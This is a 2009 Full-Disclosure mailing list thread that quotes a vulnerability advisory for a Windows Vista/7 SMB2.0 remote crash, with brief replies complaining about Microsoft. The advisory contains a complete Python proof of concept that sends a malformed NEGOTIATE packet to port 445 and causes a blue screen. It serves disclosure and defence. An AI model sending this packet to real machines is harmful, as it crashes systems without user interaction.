[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOLREQUEST Remote B.S.O.D.



Nearly a year before release, of the new version (of the same thing).

*sigh*
  ----- Original Message ----- 
  From: James Matthews 
  To: full-disclosure@xxxxxxxxxxxxxxxxx 
  Sent: Thursday, September 10, 2009 12:56 AM
  Subject: Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE 
PROTOCOLREQUEST Remote B.S.O.D.


  So Msoft! why can't they just stop reintroducing bugs?


  On Wed, Sep 9, 2009 at 11:04 AM, <randomguy@xxxxxxxxxxxx> wrote:

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    How come all I hear about is n3td3v, and I see noone crying out
    lout about this :
    http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&ta
    sk=show&action=view&id=64&Itemid=15

    is fd all 'bout trolls nao?

    - --
    =============================================
    - - Release date: September 7th, 2009

    - - Discovered by: Laurent Gaffié
    - - Severity: Medium/High
    =============================================

    I. VULNERABILITY
    - -------------------------
    Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

    II. BACKGROUND
    - -------------------------
    Windows vista and newer Windows comes with a new SMB version named
    SMB2.
    See:
    http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S
    erver_Message_Block_2.0
    for more details.

    III. DESCRIPTION
    - -------------------------
    SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
    PROTOCOL REQUEST functionnality.
    The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send
    to a SMB server, and it's used
    to identify the SMB dialect that will be used for futher
    communication.

    IV. PROOF OF CONCEPT
    - -------------------------

    Smb-Bsod.py:

    #!/usr/bin/python
    # When SMB2.0 recieve a "&" char in the "Process Id High" SMB
    header field it dies with a
    # PAGE_FAULT_IN_NONPAGED_AREA

    from socket import socket
    from time import sleep

    host = "IP_ADDR", 445
    buff = (
    "\x00\x00\x00\x90" # Begin SMB header: Session message
    "\xff\x53\x4d\x42" # Server Component: SMB
    "\x72\x00\x00\x00" # Negociate Protocol
    "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
    "\x00\x26"# Process ID High: --> :) normal value should be
    "\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    "\x30\x30\x32\x00"
    )
    s = socket()
    s.connect(host)
    s.send(buff)
    s.close()

    V. BUSINESS IMPACT
    - -------------------------
    An attacker can remotly crash without no user interaction, any
    Vista/Windows 7 machine with SMB enable.
    Windows Xp, 2k, are NOT affected as they dont have this driver.

    VI. SYSTEMS AFFECTED
    - -------------------------
    Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
    Win Server 2008
    as it use the same SMB2.0 driver (not tested).

    VII. SOLUTION
    - -------------------------
    Vendor contacted, but no patch available for the moment.
    Close SMB feature and ports, until a patch is provided.

    VIII. REFERENCES
    - -------------------------
    http://microsoft.com

    IX. CREDITS
    - -------------------------
    This vulnerability has been discovered by Laurent Gaffié
    Laurent.gaffie{remove-this}(at)gmail.com
    http://g-laurent.blogspot.com/

    X. LEGAL NOTICES
    - -------------------------
    The information contained within this advisory is supplied "as-is"
    with no warranties or guarantees of fitness of use or otherwise.
    I accept no responsibility for any damage caused by the use or
    misuse of this information.


    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
    -----BEGIN PGP SIGNATURE-----
    Charset: UTF8
    Note: This signature can be verified at https://www.hushtools.com/verify
    Version: Hush 3.0

    wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr
    mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL
    pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC
    6kWcu5Q=
    =MjSD
    -----END PGP SIGNATURE-----

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/



  -- 
  http://www.jewelerslounge.com






------------------------------------------------------------------------------


  _______________________________________________
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/